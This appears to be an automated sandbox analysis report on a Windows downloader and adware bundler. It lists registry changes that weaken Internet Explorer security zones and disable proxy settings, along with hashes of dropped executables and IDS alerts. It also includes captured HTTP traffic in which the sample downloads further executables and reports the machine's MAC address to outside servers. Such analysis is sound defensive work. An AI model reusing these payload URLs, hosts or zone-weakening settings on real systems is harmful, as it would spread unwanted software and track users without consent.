"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\vgkk]
"in1" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\tqrili]
"DisplayVersion" = "${PRODUCT_VERSION}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\tqrili]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\tqrili\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 16 5B DF A7 58 79 D5 66 EE 7D 23 1E 93 A1 0B"
[HKLM\SOFTWARE\vgkk]
"g" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\tqrili]
"DisplayName" = "天启日历"
"URLInfoAbout" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process xkcc_50091167828.exe:2196 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 26 73 62 52 34 F8 65 5E C5 F8 DA 9A 5B B8 0C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%]
"Application Dataypfbyfgmr.exe" = "ainimei Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
| MD5 | File path |
|---|---|
| 1ef9b76bcbf5cc9f01257ceaae19998e | c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\2.0.1.1001\AppleDTAssistant.exe |
| 2025b30e5b88dc462ed31bbc0192b123 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\2.0.1.1001\AppleDesktop.exe |
| c6240767ccc6a1ed71dbd5cb6178d32c | c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\AppleDTShellExt.dll |
| 0e4521e149ac94328d1beab16f83445a | c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\AppleDTShellExt64.dll |
| a9ef5e948fdc2fd84897174858d959d4 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\Helper\AppleHelper.exe |
| 9d3d5c2e13e92d330fbac22e1e2534d0 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\Helper\dshow.exe |
| 50f5a96bbc38592c5274b376fc35a5fb | c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\Helper\mini.exe |
| 5cebd6b9637597fae7058527b8d13ff7 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\iApple.exe |
| 552855ae554876f7d7ec0860147542b9 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\AppleDesktop\uninst.exe |
| 15b5cbaab65ab6bd15b36cec9ff11555 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\sjss\sjss.exe |
| 05714e222ea2fdbf70414cc82b4fa9ab | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\sjss\uninstall.exe |
| ae3d0b0686f4b89c6bdcd69dfa8fc3b1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\a-zm-157391-v5[1].exe |
| 58c77b4b19dba6c3a2971c0b3735fc45 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\axult[1].exe |
| 430f63435575980f70192c4602af8f0b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\tqrl_89_177560[1].exe |
| 6d6dbaafbdb27b66f2773203ae554b05 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\IFoxInstall-y-c203945859-run-s-x[1].exe |
| ecb3ddfae392af902d474849469561cb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\axuls[1].exe |
| 02aab2d719917873b95f7e285991ad62 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\sjss_jing_zhimeng_217[1].exe |
| e3778a31940fa71715d6160116404107 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\apples_5_1008[1].exe |
| 181da1458ff21bf5fe0197cbd8a369c6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\setup_2948-140896[1].exe |
| c00935fa58f07e1912b5403e23b56a03 | c:\Program Files\FM4.0\201409180317\DuiLib.dll |
| a6aa0ce59d41ae32aacb4870672abce0 | c:\Program Files\FM4.0\201409180317\FHSev.exe |
| 299d4ccd683231974ba6e2dc9b3ed79c | c:\Program Files\FM4.0\201409180317\Unins.exe |
| 4e21252ab923193b4fda81e4565b5401 | c:\Program Files\FM4.0\201409180317\audio.dll |
| 626eb51c0d3de4ba871f04a9aca8c5d5 | c:\Program Files\FM4.0\201409180317\avcodec-54.dll |
| 623fdb29b9965a145eb8bb40327c73a4 | c:\Program Files\FM4.0\201409180317\avcore.dll |
| 41d743562a515aeea619f53ddabb0440 | c:\Program Files\FM4.0\201409180317\avformat-54.dll |
| 5c9f02d245994a48af6502be4b40cd1b | c:\Program Files\FM4.0\201409180317\avutil-52.dll |
| f02b692e92c1870071bfe7e7e2ff3948 | c:\Program Files\FM4.0\201409180317\fm4.exe |
| d2dfe4ef36e03c9d18c333c3e754314a | c:\Program Files\FM4.0\201409180317\fm4svr.exe |
| d2f7b09bb01aee3366a531acbfe0f131 | c:\Program Files\FM4.0\201409180317\libav.dll |
| b82801876d49fb80044b84c142746efd | c:\Program Files\FM4.0\201409180317\pthreadGC2.dll |
| d324717f930dd98013d786fb47d81d3f | c:\Program Files\FM4.0\201409180317\source.dll |
| 0f4aee47b55b4dcbf4a365f2c71de951 | c:\Program Files\FM4.0\201409180317\swresample-0.dll |
| 6d6dbaafbdb27b66f2773203ae554b05 | c:\Program Files\fjwyusp\IFoxInstall-y-c203945859-run-s-x.exe |
| ae3d0b0686f4b89c6bdcd69dfa8fc3b1 | c:\Program Files\fjwyusp\a-zm-157391-v5.exe |
| ecb3ddfae392af902d474849469561cb | c:\Program Files\fjwyusp\axuls.exe |
| 58c77b4b19dba6c3a2971c0b3735fc45 | c:\Program Files\fjwyusp\axult.exe |
| 61bb8719ef4107fef3038415b4660429 | c:\Program Files\fjwyusp\fjwyusp.exe |
| e3778a31940fa71715d6160116404107 | c:\Program Files\fjwyusp\hzsoft\apples_5_1008.exe |
| 02aab2d719917873b95f7e285991ad62 | c:\Program Files\fjwyusp\hzsoft\sjss_jing_zhimeng_217.exe |
| 430f63435575980f70192c4602af8f0b | c:\Program Files\fjwyusp\hzsoft\tqrl_89_177560.exe |
| 919698fd27d7d63723a9407191b11420 | c:\Program Files\fjwyusp\rnr20.dll |
| 181da1458ff21bf5fe0197cbd8a369c6 | c:\Program Files\fjwyusp\setup_2948-140896.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 67196 | 67584 | 4.54827 | 5c4d5ace2672731f58b9d31b4d21f13f |
| .rdata | 73728 | 6101 | 6144 | 3.82125 | 019ad0f666e2ac17292e5d20e1bdf6c3 |
| .data | 81920 | 49140 | 512 | 2.45613 | 2821477811bfd11f4acd2c1da2aba6da |
| .CRT | 131072 | 16 | 512 | 0.147711 | 324bcdad78da9eab2e1651550291e550 |
| .rsrc | 135168 | 15968 | 16384 | 2.49689 | 01295a5b863fa84cf5ba5849995fa5ca |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 4
0808a47e7121b9bb97477cdc66a9573f
fa6954afc23b8eb00d4e2b7ae8b5ad44
34b8cea184d1c315eaaa766888f0d691
603997420d04a16f1b040095040542a7
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send html content
ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/4.0)
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY HTTP Request on Unusual Port Possibly Hostile
Traffic
GET /index.php?encode=NTSwDwNTSwDwKlllcyxwY2EqMDSwDtMEMtMjktIkLEEtIkLEItMzcscG9pc29uKixWZXJzaW9uKjIuMC4xLjEwMDEsbGFzdF90aW1lcyoxNDEwIkLTk5NDIzLHN0YXTgF1cyoySwDSwDQegZ27vc&process=apples_5_1008.exe HTTP/1.1
Host: wcapi.9vh.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:17:27 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
POST /config/iplocater HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0
Host: API.TUPIAN8.CN
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 302 FOUND
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:17:57 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 219
Connection: close
Location: hXXp://API.TUPIAN8.CN/login
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link...
GET /sohu/s26h23eab6/ifox/TGogo6wdTGwyTAuHoaX1aa1yov-UE3tAkah9tliosGtNs91v/SohuNewPlayer.exe HTTP/1.1
Accept: */*
Connection: Keep-Alive
Cache-Control: no-cache
Host: 58.216.27.32
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:17:12 GMT
Content-Type: application/octet-stream
Content-Length: 16733640
Last-Modified: Wed, 13 Aug 2014 16:11:05 GMT
Connection: keep-alive
ETag: "53eb8e19-ff55c8"
Expires: Fri, 16 Jan 2015 00:17:12 GMT
Cache-Control: max-age=10368000
Accept-Ranges: bytes
<<< skipped >>>
GET /xkgb/xkcc_50091167828.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.chinashangrui.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 17 Sep 2014 23:53:10 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Keep-Alive: timeout=20
Location: hXXp://down.chinashangrui.com/xkna/xkna_50091167828.exe
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
GET /xkna/xkna_50091167828.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.chinashangrui.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 17 Sep 2014 23:53:10 GMT
Content-Type: application/octet-stream
Content-Length: 3465728
Last-Modified: Sun, 24 Aug 2014 08:48:04 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "53f9a6c4-34e200"
Accept-Ranges: bytes
<<< skipped >>>
GET /ext/ext.7z HTTP/1.1
User-Agent: DownLoad
Host: s.sogv.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:18:30 GMT
Content-Length: 54492
Content-Type: application/octet-stream
Content-Location: hXXp://s.sogv.com/ext/ext.7z
Last-Modified: Sun, 20 Jul 2014 14:08:34 GMT
Accept-Ranges: bytes
ETag: "861c1f1824a4cf1:195f"
Server: NGINX/0.6.39
X-Powered-By: WAF/2.0
<<< skipped >>>
GET /fwtj.ashx?v=1.14.820.1 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: updatetest.wuji.com
Pragma: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.1
Date: Thu, 18 Sep 2014 00:17:58 GMT
Content-Type: text/html
Connection: close
0A0
GET /stj.ashx?v=1.14.820.1&t=41 HTTP/1.1
Host: updatetest.wuji.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.1
Date: Thu, 18 Sep 2014 00:17:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
3
0A0
0
GET /tc.htm HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hXXp://adsvc2.9365.info/ad/softad/popup.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc1.haoda123.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:33 GMT
<<< skipped >>>
GET /stat.php?id=4327411&web_id=4327411&show=pic HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwc
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s85.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Date: Thu, 18 Sep 2014 00:16:56 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Thu, 18 Sep 2014 00:16:56 GMT
Expires: Thu, 18 Sep 2014 01:46:56 GMT
<<< skipped >>>
GET /280cf9c20714744ccd17e57f66106dc70000000000370d38/9291/15474/setup_2949-14598.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: 175.6.4.178
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 18 Sep 2014 00:17:07 GMT
Content-Type: application/octet-stream
Content-Length: 3607864
Last-Modified: Mon, 22 Jul 2013 07:13:16 GMT
Connection: keep-alive
ETag: "51ecdb8c-370d38"
Accept-Ranges: bytes
<<< skipped >>>
POST /cstat.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; VVV.eliang.com)
Host: stat.eliang.com
Content-Length: 204
Cache-Control: no-cache
#237348652
PGdgJjw2bB0QdxlpHWYCF1tbP0F3allZIW9gIy9bd2pZXzkmbBhQWjlnZgBkfmIFaAN6an8deWNhGmk/Ii1uHXlhfRxrBGZvZhhhZmYaaD8jM24eeWJ9GHYEempiADQiIUU/RhVvDB1lYmkHP00vUDBFMW9gHWgEc3ZhH2RlaB1vDX9sfx5tYGgdYgd/aWA=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:17:26 GMT
Content-Type: text/html
Content-Length: 1
Connection: keep-alive
0
GET /9.gif?abc=1&rnd=879903237 HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwc
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Tengine
Date: Thu, 18 Sep 2014 00:16:58 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=ehKhDDcf y8CAcGK9OfwIiB ; expires=Sun, 15-Sep-24 00:16:58 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=55f33414; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=6af4cab89912e5d826d1b53a_1410999418; expires=Sun, 15-Sep-24 00:16:58 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=ehKhDDcf y8CAcGK9OfwIiB
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
POST /report/install HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0
Content-Length: 95
Host: API.TUPIAN8.CN
Content-Type: application/x-www-form-urlencoded
data=pid=juese.exe.sn=a-zm-157391-v5.exe.mac=000c298a8b37.sign=caffe9902757bc952e61973b93c16d40
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:18:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2
Connection: close
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
ok
GET /appupdate/ver.txt HTTP/1.1
Host: update.yinyue.fm
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 18 Jun 2013 05:57:08 GMT
Accept-Ranges: bytes
ETag: "32a6e0aae86bce1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:18:05 GMT
Content-Length: 36
[appver]
ver=1.0
ver2=20130606
GET /kbtongji.asp?sn=sjss_jing_zhimeng_217.exe&tmac=8a0c008b3729&action=kb&ver=0.4 HTTP/1.1
User-Agent: LETITGO
Host: updateinfo.yyhsj.cn
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:17:54 GMT
Server: Microsoft-IIS/6.0
Content-Length: 2
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQDSSCRR=MEDDEKNAAHFBPBIPAFDAHEDO; path=/
Cache-control: private
OK
GET /a.ashx?v=51856086832E9ADB347D74A1629E1CFEB5DC550C165417452F22832D24A951CAAFFC03962B62E52CCBF64CA69B5AF643186FDCD5FBEAC2F2F99B14F7904EE489ACB7D5F447E350A705904461522CDC97865D9D861FB35CB7248760DE2BB230184CB1882A5F42401CB6EB7ECD8659BA964F712249A8AFF852125B284DE3F595E4604E0B1FF6D36DC4 HTTP/1.1
Host: tongji.yinyue.fm
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:15:41 GMT
Content-Length: 3
100
GET /tqrl_89_177560.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.tianyunxj.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:17:30 GMT
Content-Length: 3098224
Content-Type: application/octet-stream
Last-Modified: Sat, 13 Sep 2014 01:10:57 GMT
Connection: Keep-Alive
ETag: "6c7c992efcecf1:1819"
Content-Location: hXXp://down.tianyunxj.com/setup.exe?404;hXXp://down.tianyunxj.com:80/tqrl_89_177560.exe
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Fw-Via: MISS from cnc-sd-153-130.fcd, DISK HIT from ctl-gx-254-147.fcd
<<< skipped >>>
GET /dc/setup/install/2.0.1.1001/c654925393ae14277410758bb43bb4ec/2561/28/1970-1-1/?result=succ HTTP/1.1
Host: appledesktop.sinaapp.com
Connection: Keep-Alive
HTTP/1.1 204 NO CONTENT
Server: nginx/1.4.4
Date: Thu, 18 Sep 2014 00:17:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
via: yq26.pyruntime
Set-Cookie: saeut=CkMPGlQaJJckXHMaBsTpAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/
GET /foxd/gz?file=SohuNewPlayer.exe&new=/212/10/LX1gaYhp2TxOw4UbWrnLg7.exe HTTP/1.1
Accept: */*
Host: data.vod.itc.cn
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Server: nginx
Date: Thu, 18 Sep 2014 00:17:11 GMT
Content-Length: 0
Connection: close
X-CDN-Type: 0
Location: hXXp://58.216.27.32/sohu/s26h23eab6/ifox/TGogo6wdTGwyTAuHoaX1aa1yov-UE3tAkah9tliosGtNs91v/SohuNewPlayer.exe
GET /ad/softad/popup.htm HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc2.9365.info
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 627
Content-Type: text/html
Last-Modified: Tue, 06 Nov 2012 14:53:24 GMT
Accept-Ranges: bytes
ETag: "147dba782ebccd1:1cc1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:29 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="hXXp://VVV.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>........</title>
<script type="text/javascript" src="hXXp://cbjs.baidu.com/js/s.js"></script>
</head>
<body>
<iframe src="hXXp://adsvc1.haoda123.com/tc.htm" scrolling="no" frameborder="0" height="0" width="0" allowtransparency="true" border="0" style="width:100%"></iframe>
<script type="text/javascript">BAIDU_CLB_singleFillSlot("98364");</script>
</body>
</html>
GET /9291/25605/sjss_jing_zhimeng_217.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.grandcloud.cn
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.7.2
Date: Thu, 18 Sep 2014 00:17:05 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 101
Connection: keep-alive
Location: hXXp://183.61.184.37/02aab2d719917873b95f7e285991ad620000000000082370/9291/25605/sjss_jing_zhimeng_217.exe
<html><head><title>Moved Temporarily</title></head><body><h1>302 Moved Temporarily</h1></body></html>
GET /htop/htop_x.exe HTTP/1.1
Accept: */*
